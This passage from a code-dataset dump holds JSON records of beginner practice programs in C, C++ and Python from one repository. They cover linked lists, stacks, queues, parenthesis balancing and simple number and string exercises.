std;\n\nbool IsBalanced(char input[])\n{\n char data[100], lastChar;\n int len = strlen(input), top = 0;\n\n for(int i = 0; i < len; i++)\n {\n if(input[i] == '(')\n {\n data[top] = '(';\n top++;\n }\n else if(input[i] == ')')\n {\n if(top == 0) return false;\n top--;\n }\n }\n\n if(top == 0) return true;\n else return false;\n}\n\nint main()\n{\n char input[100];\n scanf(\"%s\", input);\n\n if(IsBalanced(input)) printf(\"True\\n\");\n else printf(\"False\");\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.473053902387619, "alphanum_fraction": 0.47562018036842346, "avg_line_length": 19.437063217163086, "blob_id": "7596f9535e79ee5cee5645140c4537e3b0893a0f", "content_id": "a5c810cc46b7edca9e6a5c43ebf483a82aa1d207", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5845, "license_type": "no_license", "max_line_length": 74, "num_lines": 286, "path": "/Singly Linked list.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//a try by kowshid\n//#include <bits/stdc++.h>\n#include <stdio.h>\n#include <stdlib.h>\nusing namespace std;\n\ntypedef struct node Node;\n\nstruct node\n{\n int data;\n Node *next;\n};\n\nclass LinkedList\n{\npublic:\n Node *head;\n Node *tail;\n\n LinkedList()\n {\n head = NULL;\n tail = NULL;\n }\n\n //checks if list is empty. returns true if empty, false otherwise\n bool EmptyList()\n {\n if(head) return false;\n else return true;\n }\n\n //Creates Nodes with NULL next pointer\n Node* CreateNode(int item)\n {\n Node *newNode = (Node *) malloc(sizeof(Node));\n\n if(newNode == NULL)\n {\n printf(\"Error! Couldn't create new node\\n\");\n return NULL;\n }\n newNode->data = item;\n newNode->next = NULL;\n\n return newNode;\n }\n\n //Searches Nodes using data value, returns the node found\n //in case of multiple match, returns the first instance\n Node *SearchNode(int item)\n {\n if(EmptyList())\n {\n printf(\"Empty List, nothing to search for\\n\");\n return NULL;\n }\n\n Node *current = head;\n while(current != NULL)\n {\n if(current->data == item) break;\n current = current->next;\n }\n\n if(current == NULL) printf(\"No such node found in search\\n\");\n\n return current;\n }\n\n //Inserting in front of list\n void Prepend(int item)\n {\n Node *newNode = CreateNode(item);\n\n if(EmptyList())\n {\n head = newNode;\n tail = newNode;\n return;\n }\n\n newNode->next = head;\n head = newNode;\n }\n\n //Inserting at the end\n void Append(int item)\n {\n Node *newNode = CreateNode(item);\n\n if(EmptyList())\n {\n head = newNode;\n tail = newNode;\n return;\n }\n\n Node *current = head;\n while(current->next != NULL)\n {\n current = current->next;\n }\n\n current->next = newNode;\n tail = newNode;\n\n }\n\n //Inserting after a certain data valued node\n void InsertAfterItem(int item, Node *previousNode)\n {\n Node *newNode = CreateNode(item);\n if(EmptyList())\n {\n head = newNode;\n tail = newNode;\n }\n\n if(previousNode == NULL)\n {\n printf(\"Node not specified, Can't add\\n\");\n return;\n }\n\n newNode->next = previousNode->next;\n previousNode->next = newNode;\n if(previousNode == tail) tail = newNode;\n }\n\n //O for empty node\n int CountNode()\n {\n if(EmptyList())\n {\n printf(\"\\nEmpty List\\n\");\n return 0;\n }\n\n int result = 0;\n Node *current = head;\n while(current != NULL)\n {\n result++;\n current = current->next;\n }\n\n return result;\n }\n\n //Removes node with data value\n //In case of multiple Node having same data, first instance is deleted\n void RemoveItem(int item)\n {\n if(EmptyList())\n {\n printf(\"\\nEmpty List, Can't remove anything\\n\");\n return;\n }\n\n Node *target = SearchNode(item);\n //printf(\"target->data = %d\\n\", target->data);\n\n if(target == NULL)\n {\n printf(\"No such node to delete\\n\");\n return;\n }\n\n if(target == head)\n {\n if(target == tail)\n {\n head = NULL;\n tail = NULL;\n return;\n }\n head = head->next;\n free(target);\n return;\n }\n\n Node *current = head;\n while(current->next != target)\n {\n current = current->next;\n }\n\n current->next = target->next;\n if(target == tail) tail = current;\n free(target);\n }\n\n //position starts from 1\n //removes node from specified position\n void RemoveAtPos(int position)\n {\n int len = CountNode();\n //printf(\"len = %d\\n\", len);\n\n if(len < position)\n {\n printf(\"Invalid position, not deleted anything\\n\");\n return;\n }\n\n Node *target;\n\n if(len == 1)\n {\n target = head;\n head = NULL;\n tail = NULL;\n free(target);\n return;\n }\n\n Node *current = head;\n\n while(position-2)\n {\n position--;\n //printf(\"pos = %d\\n\", position);\n current = current->next;\n }\n\n //printf(\"current = %d\\n\", current->data);\n\n target = current->next;\n\n current->next = target->next;\n if(target == tail) tail = current;\n free(target);\n }\n\n void PrintList()\n {\n if(EmptyList())\n {\n printf(\"Empty List\\n\");\n return;\n }\n\n Node *current = head;\n printf(\"Current List:\\n\");\n while(current != NULL)\n {\n printf(\"%d->\", current->data);\n current = current->next;\n }\n printf(\"\\n\");\n }\n\n void headtail()\n {\n if(head == NULL && tail == NULL)\n {\n printf(\"No head or tail\\n\");\n return;\n }\n printf(\"head = %d, tail = %d\\n\", head->data, tail->data);\n }\n};\n\nint main()\n{\n LinkedList lList;\n Node *temp;\n //lList.RemoveAtPos(4);\n //lList.RemoveItem(4);\n lList.Prepend(1);\n lList.Append(2);\n lList.PrintList();\n lList.headtail();\n lList.Prepend(0);\n lList.Append(2);\n lList.headtail();\n lList.PrintList();\n //lList.RemoveItem(2);\n temp = lList.SearchNode(2);\n lList.InsertAfterItem(5, temp);\n lList.headtail();\n lList.PrintList();\n return 0;\n}\n" }, { "alpha_fraction": 0.5005123019218445, "alphanum_fraction": 0.5097336173057556, "avg_line_length": 20.854476928710938, "blob_id": "8494fa77bec2cb4053c095a38be20e06f3f57be5", "content_id": "0855b4c69c3614a0400587bb938f02d27925b1cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5856, "license_type": "no_license", "max_line_length": 61, "num_lines": 268, "path": "/LinkedList.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "from collections import defaultdict\n\nsuccess = 1\nfail = 0\n\nclass Node:\n def __init__(self, val = 0, next = None):\n self.val = val\n self.next = next\n\n# delete , insert, search, print, insert last, insert before\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def makeNode(value, next):\n node = Node(value, next)\n return node\n\n def isEmpty(self):\n if self.head is None:\n print(\"List is empty\")\n return True\n return False\n\n def search(self, target):\n if self.isEmpty():\n print(\"Nothing to search\")\n return fail\n\n temp = self.head\n while temp is not None:\n if temp.val == target:\n return temp\n temp = temp.next\n\n if temp is None:\n print(\"Not in list\")\n\n return None\n # 1 2 3 4 5\n def searchBefore(self, target):\n # last element is not returned\n if self.isEmpty():\n print(\"Nothing to search\")\n return fail\n\n if self.head.val == target:\n return None\n\n temp = self.head\n while temp.next is not None:\n if temp.next.val == target:\n return temp\n temp = temp.next\n\n print(\"Not in list\")\n return fail\n\n def insertFirst(self, value):\n node = Node(value)\n\n if self.isEmpty():\n self.head = node\n return success\n\n node.next = self.head\n self.head = node\n return success\n\n def insertLast(self, value):\n node = Node(value)\n\n if self.isEmpty():\n self.head = node\n return success\n\n temp = self.head\n while temp.next is not None:\n temp = temp.next\n\n temp.next = node\n return success\n\n def insertAfter(self, value, target):\n if self.isEmpty():\n print(\"Nothing to search\")\n return fail\n\n targetNode = self.search(target)\n\n node = Node(value)\n node.next = targetNode.next\n targetNode.next = node\n\n return success\n\n def insertBefore(self, value, target):\n if self.isEmpty():\n print(\"Nothing to search\")\n return fail\n # 1 2 3 5\n node = Node(value)\n targetNode = self.searchBefore(target)\n\n # in case of before head\n if targetNode is fail:\n print(\"Nothing to search\")\n return fail\n\n if targetNode is None:\n node.next = self.head\n self.head = node\n return success\n\n node.next = targetNode.next\n targetNode.next = node\n\n return success\n\n def delete(self, target):\n if self.isEmpty():\n print(\"Nothing to delete\")\n return fail\n\n targetNode = self.searchBefore(target)\n if targetNode == fail:\n print(\"Nothing to delete\")\n return fail\n\n if targetNode is None:\n self.head = self.head.next\n return success\n\n targetNode.next = targetNode.next.next\n return success\n\n def deleteLast(self):\n if self.isEmpty():\n print(\"Nothing to delete\")\n return fail\n\n temp = self.head\n prev = None\n\n if temp.next == None:\n self.head = None\n return success\n\n while temp.next is not None:\n prev = temp\n temp = temp.next\n\n prev.next = None\n return success\n\n def removeDuplicateUnsorted(self):\n if self.isEmpty():\n print(\"List is empty, nothing to remove\")\n return\n if self.head.next is None:\n return\n\n keys = set()\n prev = self.head\n temp = prev.next\n keys.add(prev.val)\n\n while temp:\n if temp.val not in keys:\n keys.add(temp.val)\n prev.next = temp\n prev = temp\n\n temp = temp.next\n\n prev.next = None\n\n # 0 = > 1 = > 1 = > 1 = > 2 = > 3 = > 4 = > 5 = > 5 = > 6\n\n def removeDuplicateSorted(self):\n if self.isEmpty():\n return\n if self.head.next is None:\n return\n\n prev = self.head\n temp = prev.next\n\n while temp:\n if prev.val == temp.val:\n prev.next = temp.next\n temp.next = None\n else:\n prev = temp\n temp = temp.next\n # if prev.val != temp.val:\n # prev = temp\n # temp = temp.next\n\n prev.next = None\n\n def reverse(self):\n if self.isEmpty():\n return None\n if self.head.next is None:\n return self.head\n\n # 1 2 3 4 5\n prev = None\n while self.head:\n temp = self.head.next\n self.head.next = prev\n prev = self.head\n self.head = temp\n\n self.head = prev\n\ndef printList(head):\n if head is None:\n return fail\n\n while head:\n print(head.val, end=\"=>\")\n head = head.next\n\n print()\n return success\n# 1 2 3 4 5\ndef reverse(node):\n if node is None:\n return None\n\n if node.next is None:\n return node\n\n new_head = reverse(node.next)\n node.next.next = node\n node.next = None\n return new_head\n\ndef main():\n ll = LinkedList()\n ll.insertFirst(2)\n ll.insertFirst(1)\n ll.insertLast(4)\n ll.insertBefore(3, 4)\n ll.insertAfter(6, 4)\n ll.insertBefore(0, 1)\n ll.insertBefore(5, 6)\n # printList(ll.head)\n # ll.reverse()\n\n ll.insertBefore(5, 5)\n ll.insertBefore(1, 1)\n ll.insertBefore(1, 1)\n\n printList(ll.head)\n\n ll2 = LinkedList()\n ll2.head = reverse(ll.head)\n printList(ll2.head)\n\n ll2.reverse()\n printList(ll2.head)\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.27986347675323486, "alphanum_fraction": 0.31655290722846985, "avg_line_length": 17.03076934814453, "blob_id": "8395621d6fdda0dfc4b3aa40c6bf19413b93553a", "content_id": "09dbc1009781bc4b2bfb308c04cfd833c3cf9ce6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1172, "license_type": "no_license", "max_line_length": 48, "num_lines": 65, "path": "/Sorting 3 numbers.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\nSorting of 3 input integers\n*/\n\n#include <stdio.h>\n\nint main()\n{\n int T, n1, n2, n3, temp;\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \"%d\", &n1);\n fscanf(fptr, \"%d\", &n2);\n\n if(n1 > n2) //need to make n1 < n2\n {\n temp = n1;\n n1 = n2;\n n2 = temp;\n }\n\n fscanf(fptr, \"%d\", &n3);\n\n if(n3 > n2)\n ;\n\n else if(n3 > n1)\n {\n temp = n3;\n n3 = n2;\n n2 = temp;\n }\n\n else if(n3 < n1)\n {\n temp = n3;\n n3 = n2;\n n2 = temp;\n\n temp = n2;\n n2 = n1;\n n1 = temp;\n }\n\n printf(\"%d %d %d\\n\", n1, n2, n3);\n }\n }\n else\n printf(\"T out of bound\\n\");\n\n return 0;\n}\n" }, { "alpha_fraction": 0.3399638235569, "alphanum_fraction": 0.3725135624408722, "avg_line_length": 24.18181800842285, "blob_id": "6909add870e1189f1a87f5d67cb3d79c5ce7046c", "content_id": "b138587ffc0cca1fcad8cf04f8a14d1b4594cf25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 48, "num_lines": 22, "path": "/ZigZag Array.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "def zigzagArray(arr):\n n = len(arr)\n flag = True\n for i in range(n-1):\n if flag:\n if arr[i] > arr[i+1]:\n arr[i] = arr[i] ^ arr[i + 1]\n arr[i + 1] = arr[i] ^ arr[i + 1]\n arr[i] = arr[i] ^ arr[i + 1]\n\n else:\n if arr[i] < arr[i + 1]:\n arr[i] = arr[i] ^ arr[i + 1]\n arr[i + 1] = arr[i] ^ arr[i + 1]\n arr[i] = arr[i] ^ arr[i + 1]\n\n flag = not flag\n\n return arr\n\narr = [4, 3, 7, 8, 6, 2, 1]\nprint(zigzagArray(arr))" }, { "alpha_fraction": 0.42329150438308716, "alphanum_fraction": 0.44142258167266846, "avg_line_length": 15.870588302612305, "blob_id": "fce08780b758b50448600239f63e8104e9fed73a", "content_id": "e0d53b96e30cf3a460c918695ab3bf2df12fef44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1434, "license_type": "no_license", "max_line_length": 66, "num_lines": 85, "path": "/stack.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//a try by kowshid\n//#include <bits/stdc++.h>\n#include <stdio.h>\n//#include <stdlib.h>\nusing namespace std;\n\n#define STACK_MAX 50\n\nclass Stack\n{\npublic:\n int top;\n int data[STACK_MAX];\n\n Stack()\n {\n top = 0;\n printf(\"Stack created, top = 0\\n\");\n }\n\n bool Empty()\n {\n if(!top) return true;\n else return false;\n }\n\n void push(int n)\n {\n if(top < STACK_MAX)\n {\n data[top] = n;\n top++;\n }\n else printf(\"\\nNot Enough Space\\n\");\n }\n\n void pop()\n {\n if(Empty()) printf(\"\\nStack is empty, No item to pop\\n \");\n else top--;\n }\n\n int topElement()\n {\n if(Empty())\n {\n printf(\"\\nStack is empty\\n\");\n return -1;\n }\n else return data[top-1];\n }\n\n void print()\n {\n printf(\"\\nCurrent Stack\\n\");\n if(Empty()) printf(\"*empty*\\n\");\n else\n {\n for(int i = 0; i < top; i++)\n {\n printf(\"%d \", data[i]);\n }\n }\n }\n};\n\nint main()\n{\n Stack s1;\n s1.push(5);\n s1.push(6);\n s1.push(2);\n s1.print();\n printf(\"\\nCurrent top element is %d\\n\", s1.topElement());\n //s1.topElement();\n s1.pop();\n s1.pop();\n printf(\"\\nCurrent top element is %d\\n\", s1.topElement());\n s1.print();\n s1.pop();\n s1.pop();\n s1.pop();\n s1.print();\n return 0;\n}\n" }, { "alpha_fraction": 0.5542168617248535, "alphanum_fraction": 0.5662650465965271, "avg_line_length": 5.916666507720947, "blob_id": "23e4cc3a0209d7def5f489d7e737be487941fb94", "content_id": "3699f1c3cc429968d7e396bc6dbce1146cc06ccf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 83, "license_type": "no_license", "max_line_length": 24, "num_lines": 12, "path": "/lcm.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\nlcm of two given numbers\n*/\n\n#include <stdio.h>\n\nint main()\n{\n\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5490981936454773, "alphanum_fraction": 0.5531061887741089, "avg_line_length": 17.481481552124023, "blob_id": "87ea51c10ea61da0711d37e373eb7f4a191a1270", "content_id": "e0104c55c56a1ff2cece0dc3d2e90c98d11674a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 499, "license_type": "no_license", "max_line_length": 73, "num_lines": 27, "path": "/Number Count.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <fstream>\n#include <sstream>\n#include <string>\n\nusing namespace std;\n\nint main()\n{\n ifstream infile(\"D:\\\\input.txt\");\n string line, temp;\n int count;\n\n while(getline(infile, line)) //here delimiter for getline is '\\n'\n {\n count = 0;\n stringstream str(line);\n //cout << line << \"\\n\";\n\n while(getline(str, temp, ' ')) //using delimiter '\\n' to seperate\n count++;\n\n printf(\"%d\\n\", count);\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.3325842618942261, "alphanum_fraction": 0.3483146131038666, "avg_line_length": 12.088234901428223, "blob_id": "5b01c95664becccb75961e399991d7f206894ce5", "content_id": "2230217bd458ed57cea829e1bd736b3cece7ac74", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 445, "license_type": "no_license", "max_line_length": 35, "num_lines": 34, "path": "/Odd-Even 1.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//\n\n/*\n Input:\n Number of Input\n Inputs\n Output:\n 'even' or 'odd'\n*/\n\n#include <stdio.h>\n\nint main()\n{\n int T, n;\n\n scanf(\"%d\", &T);\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n scanf(\"%d\", &n);\n if(n % 2)\n printf(\"odd\\n\");\n else\n printf(\"even\\n\");\n }\n }\n\n else\n printf(\"T out of bound\\n\");\n\n return 0;\n}\n" }, { "alpha_fraction": 0.41982272267341614, "alphanum_fraction": 0.4407735764980316, "avg_line_length": 19, "blob_id": "2a3c149d20fdfc0468b514a620bc782d7d262000", "content_id": "b645b1c5ffe10f57b3660c898faae02909fe72c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1241, "license_type": "no_license", "max_line_length": 61, "num_lines": 62, "path": "/word count in a given string 2.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "\n/*\n input:\n T lines of string containing , . ! ? : ;\n output:\n print vowels and consonants separately\n*/\n\n#include <stdio.h>\n#include <string.h>\n#include <ctype.h>\n\nint main()\n{\n FILE *fptr;\n fptr = fopen(\"D:\\\\input.txt\", \"r\");\n\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, count;\n char str[10001], *temp, input[10001], output[10001];\n char delim[] = \" .,!?;:\";\n\n fscanf(fptr, \"%d\", &T);\n printf(\" T = %d\\n\", T);\n\n if(T <= 0 || T > 100)\n {\n printf(\"Input Error!\");\n exit(1);\n }\n\n for (int k = 0; k < T; k++)\n {\n count = 0;\n strcpy(output, \"\\0\");\n fscanf(fptr, \" %[^\\n]\", str);\n strcpy(input, str);\n\n temp = strtok(str, delim);\n strcat(output, temp);\n// printf(\"%s\\n\", output);\n while(temp != NULL)\n {\n //printf(\"%s \", temp);\n count++;\n temp = strtok(NULL, delim);\n printf(\"output = %s, temp = %s\\n\", output, temp);\n if(temp != NULL)\n strcat(output, temp);\n }\n printf(\"check\\n\");\n strcat(output, \"\\0\");\n\n printf(\"%s -> %d\\n\", output, count);\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.39759036898612976, "alphanum_fraction": 0.40963855385780334, "avg_line_length": 16.372093200683594, "blob_id": "9f8923ccb1ef7b708dbffef581db4b94caa4594c", "content_id": "9e68be3b7ee05f25bfe20474e44bc3a2aa439be4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 747, "license_type": "no_license", "max_line_length": 48, "num_lines": 43, "path": "/Perfect Square check.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\nInput: T numbers\nOutput: 'yes' or 'no'\n*/\n\n#include <stdio.h>\n#include <math.h>\n\nint main()\n{\n int T, n;\n double root, diff;\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \"%d\", &n);\n\n root = sqrt(n);\n diff = root - (int)root;\n //printf(\"%lf\\n\", diff);\n if(diff != 0.0)\n printf(\"no\\n\");\n else\n printf(\"yes\\n\");\n }\n }\n else\n printf(\"T out of bound\\n\");\n\n return 0;\n}\n" }, { "alpha_fraction": 0.3886054456233978, "alphanum_fraction": 0.40646257996559143, "avg_line_length": 20, "blob_id": "df434e738e3ea9b199c7c6f32b15f9838aff223b", "content_id": "2fb4f169f0258ec93f84df42ae9d7631436eada8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1176, "license_type": "no_license", "max_line_length": 69, "num_lines": 56, "path": "/file_problem.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <string>\n\nusing namespace std;\n\n#define N 10\n\nint main()\n{\n FILE *fin, *f_out;\n char line[20];\n int marks[3][6], idx, n;\n char files[3][20] = {\"physics.txt\", \"math.txt\", \"chemistry.txt\"};\n\n f_out = fopen(\"out.txt\", \"w\");\n\n for(int i = 0; i < 3; i++)\n {\n for(int k = 0; k < 20; k++)\n {\n line[k] = files[i][k];\n }\n\n fin = fopen(line, \"r\");\n\n if(fin != NULL)\n {\n //printf(\"opened file %s\\n\", line);\n for(int k = 0; k < 5; k++)\n {\n fscanf(fin, \"%d\", &idx);\n fscanf(fin, \"%d\", &n);\n marks[i][idx] = n;\n //printf(\"%d %d \", idx, marks[i][idx]);\n }\n fclose(fin);\n }\n else printf(\"Error Opening file\\n\");\n }\n\n f_out = fopen(\"out.txt\", \"w\");\n fprintf(f_out, \"\\nphysics, math, chem\\n\");\n for(int i = 0; i < 3; i++)\n {\n fprintf(f_out, \"\\nNumbers of %dth sub are \", i);\n for(int k = 1; k < 6; k++)\n {\n fprintf(f_out, \"%d \", marks[i][k]);\n }\n }\n\n fclose(f_out);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.3741626739501953, "alphanum_fraction": 0.38373205065727234, "avg_line_length": 20.77083396911621, "blob_id": "f7d64d524143c8fdb6723f4639c7d583b51a3093", "content_id": "5e3e46a672be01c9c0f0f7c8a3002481c3492745", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1045, "license_type": "no_license", "max_line_length": 90, "num_lines": 48, "path": "/divisor find.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//\n\n/*\n Input: T numbers\n Output:\n all divisors of each numbers\n*/\n\n#include <stdio.h>\n#include <math.h>\n\nint main()\n{\n FILE *fptr; //file pointer to read from file\n fptr = (fopen(\"D:\\\\input.txt\", \"r\"));\n if(fptr == NULL)\n {\n printf(\"File Pointer Error!\");\n exit(1);\n }\n\n int T, n, limit;\n fscanf(fptr, \"%d\", &T);\n\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n fscanf(fptr, \"%d\", &n);\n limit = sqrt(n); //searching till sqrt of any number as divisors come in pairs\n //printf(\"%d \", limit);\n printf(\"Case %d:\", i + 1);\n for(int j = 1; j <= limit; j++)\n {\n if(n % j == 0)\n {\n if(n/j != j) //not a perfect square\n printf(\" %d %d\", j, n/j);\n else\n printf(\" %d\", j);\n }\n }\n //printed list is unsorted\n printf(\"\\n\");\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.4413793087005615, "alphanum_fraction": 0.48275861144065857, "avg_line_length": 13.600000381469727, "blob_id": "f0b3bd6f8a76d89270f66db7cd077597b9ed7b0e", "content_id": "c1a0ce4ad6b92fea78f1e355ce0ec87f6a03e8a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "no_license", "max_line_length": 23, "num_lines": 10, "path": "/check.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "def countPairs():\n p = 1\n powers = [int] * 41\n for i in range(41):\n powers[i] = p\n p *= 2\n\n print(powers)\n\ncountPairs()" }, { "alpha_fraction": 0.4488416910171509, "alphanum_fraction": 0.4570463299751282, "avg_line_length": 16.709402084350586, "blob_id": "b095f049352511b3d73728c51ce30eebca4f39d4", "content_id": "78c57c1d41f6d262dd487ccbd29d8b70d220e825", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2072, "license_type": "no_license", "max_line_length": 73, "num_lines": 117, "path": "/queue.cpp", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "//a try by kowshid\n//#include <bits/stdc++.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\nusing namespace std;\n\n#define Qsize 6\n\nclass Queue\n{\npublic:\n int data[Qsize];\n int head, tail;\n\n Queue()\n {\n head = 0;\n tail = 0;\n }\n\n bool IsEmpty()\n {\n if(head == tail) return true;\n else return false;\n }\n\n bool IsFull()\n {\n if((tail+1)%Qsize == head) return true;\n else return false;\n }\n\n int sz()\n {\n if(tail >= head) return (tail-head);\n else return (tail-head+Qsize);\n }\n\n void enqueue(int item)\n {\n if(IsFull())\n {\n printf(\"\\nQueue is full\\n\");\n return;\n }\n data[tail] = item;\n tail = (tail+1)%Qsize;\n }\n\n void dequeue()\n {\n if(IsEmpty()) printf(\"Q is empty, nothing to dq\\n\");\n else\n {\n printf(\"%d is dequeued\\n\", data[head]);\n head = (head+1)%Qsize;\n }\n }\n\n int frnt()\n {\n if(IsEmpty())\n {\n printf(\"\\nNo front element, empty q\\n\");\n return -1;\n }\n return data[head];\n }\n\n int rear()\n {\n if(IsEmpty())\n {\n printf(\"No tail element, empty q\\n\");\n return -1;\n }\n return data[(tail-1+Qsize)%Qsize];\n }\n\n void print()\n {\n\n }\n};\n\nint main()\n{\n Queue q;\n\n //q.dequeue();\n //q.frnt();\n //q.rear();\n\n q.enqueue(1);\n printf(\"tail = %d\\n\", q.tail);\n q.enqueue(2);\n printf(\"tail = %d\\n\", q.tail);\n q.enqueue(3);\n printf(\"tail = %d\\n\", q.tail);\n q.enqueue(4);\n printf(\"tail = %d\\n\", q.tail);\n q.enqueue(5);\n printf(\"tail = %d\\n\", q.tail);\n //printf(\"queue size is %d\\n\", q.sz());\n q.dequeue();\n q.enqueue(6);\n q.dequeue();\n //q.enqueue(7);\n printf(\"tail = %d\\n\", q.tail);\n printf(\"head idx = %d, tail idx = %d\\n\", q.head, q.tail);\n printf(\"head element = %d, tail element = %d\\n\", q.frnt(), q.rear());\n printf(\"size = %d\\n\", q.sz());\n\n\n return 0;\n}\n" }, { "alpha_fraction": 0.536281168460846, "alphanum_fraction": 0.5447846055030823, "avg_line_length": 18.83146095275879, "blob_id": "8aa88abed85abad6047ee2ee34768d44dd1c4f08", "content_id": "e1d25ae18fcc5ed76b1c25625ebc6ab722d8e540", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1764, "license_type": "no_license", "max_line_length": 46, "num_lines": 89, "path": "/Reverse a Stack.py", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "fail = 0\nsuccess = 1\n\nclass Stack:\n def __init__(self, size):\n self.stack = []\n self.maxSize = size\n\n def isEmpty(self):\n if len(self.stack) == 0:\n return True\n return False\n\n def isFull(self):\n if len(self.stack) == self.maxSize:\n return True\n return False\n\n def push(self, item):\n if self.isFull():\n print(\"Stack Full, can not push\")\n return fail\n\n self.stack.append(item)\n return success\n\n def pop(self):\n if self.isEmpty():\n print(\"Stack Empty, can not push\")\n return fail\n\n self.stack.pop()\n return success\n\n # position is 1 indexed\n def peek(self, position):\n return self.stack[position - 1]\n\n def count(self):\n return len(self.stack)\n\n def display(self):\n print(self.stack)\n\n def top(self):\n return self.stack[len(self.stack) - 1]\n\ndef insertAtBottom(stack, item):\n if stack.isEmpty():\n stack.push(item)\n else:\n temp = stack.top()\n stack.pop()\n insertAtBottom(stack, item)\n stack.push(temp)\n\ndef reverseStack(stack):\n if not stack.isEmpty():\n temp = stack.top()\n stack.pop()\n reverseStack(stack)\n insertAtBottom(stack, temp)\n\ndef reverse(stack, ret):\n if stack.isEmpty():\n return\n temp = stack.top()\n stack.pop()\n ret.push(temp)\n reverse(stack, ret)\n\ndef main():\n stack = Stack(10)\n stack.push(1)\n stack.push(2)\n stack.push(3)\n stack.push(4)\n stack.push(5)\n stack.display()\n print(stack.top())\n stack.pop()\n stack.display()\n\n rev = Stack(10)\n reverse(stack, rev)\n rev.display()\n\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.3459119498729706, "alphanum_fraction": 0.374213844537735, "avg_line_length": 17.705883026123047, "blob_id": "a5919fd45c81b82ab90df425b72b2e8121af9ebd", "content_id": "2f5368603f57ee8fa4834b9f8ba4970d29b1f938", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 636, "license_type": "no_license", "max_line_length": 46, "num_lines": 34, "path": "/Odd-Even 2.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": "UTF-8", "text": "/*\nInput: T numbers containing at most 100 digits\nOutput: 'even' or 'odd'\n*/\n\n#include <stdio.h>\n\nint main()\n{\n int T, RMD, idx; //right most digit\n char n[101];\n\n scanf(\"%d\\n\", &T);\n if(T > 0 && T <= 100)\n {\n for(int i = 0; i < T; i++)\n {\n scanf(\"%s\", &n);\n idx = 0;\n while(n[idx] != '\\0')\n idx++;\n //printf(\"%c\\n\", n[idx-1]);\n RMD = n[idx-1] - '0';\n if(RMD % 2)\n printf(\"odd\\n\");\n else\n printf(\"even\\n\");\n }\n }\n else\n printf(\"T out of bound\\n\");\n\n return 0;\n}\n" }, { "alpha_fraction": 0.35474860668182373, "alphanum_fraction": 0.37709498405456543, "avg_line_length": 18.14285659790039, "blob_id": "1fe7964388c0bf30753f1af7478e6fec6c4ef858", "content_id": "f4e57cf258aa592580a6677a5a8dcdfdafb8157a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1074, "license_type": "no_license", "max_line_length": 61, "num_lines": 56, "path": "/char count in a string.c", "repo_name": "kowshid/Practice-Problems", "src_encoding": 